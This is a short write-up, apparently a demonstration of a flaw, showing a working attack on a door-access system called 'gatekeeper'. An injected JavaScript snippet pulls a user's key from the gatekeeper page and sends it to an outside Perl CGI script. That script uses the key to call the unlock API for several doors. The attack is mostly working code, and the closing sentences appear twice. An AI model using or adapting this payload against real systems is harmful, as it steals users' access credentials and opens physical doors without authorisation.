<script>var x=new XMLHttpRequest();x.addEventListener('load', function (event) { var key = x.responseText.match(/[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}/); setTimeout(function() {window.location = ('https://members.csh.rit.edu/~worr/gk.pl?userkey=' + key);}, 1000); }); x.open('GET', 'https://www.gatekeeper.csh.rit.edu/');x.send();</script>
This grabs the user key and sends it to this perl script:
#!/usr/local/bin/perl -wT
use strict;
use CGI;
use LWP::UserAgent;
my $q = CGI->new;
my $ua = LWP::UserAgent->new;
my $userkey = $q->param(-name => 'userkey');
my $res = $ua->post('https://api.gatekeeper.csh.rit.edu/unlock/4/', { userkey => $userkey });
my $res = $ua->post('https://api.gatekeeper.csh.rit.edu/unlock/6/', { userkey => $userkey });
my $res = $ua->post('https://api.gatekeeper.csh.rit.edu/unlock/7/', { userkey => $userkey });
print $q->header, $q->start_html;
if ($res->is_success) {
print $q->h1(uc($q->escapeHTML($ENV{WEBAUTH_USER})).' Y U UNLOCK DOORS'), $q->h2($q->escapeHTML($userkey));
print $q->p($q->escapeHTML($res->decoded_content));
} else {
print $q->h1('FUCK'), $q->h2("It didn't work...");
print $q->p($q->escapeHTML($res->decoded_content));
}
print $q->end_html;
And then all of the doors are unlocked.
It doesn't matter that you expire the API key after a few minutes, since this script takes a second to run.
This grabs the user key and sends it to this perl script:
And then all of the doors are unlocked.
It doesn't matter that you expire the API key after a few minutes, since this script takes a second to run.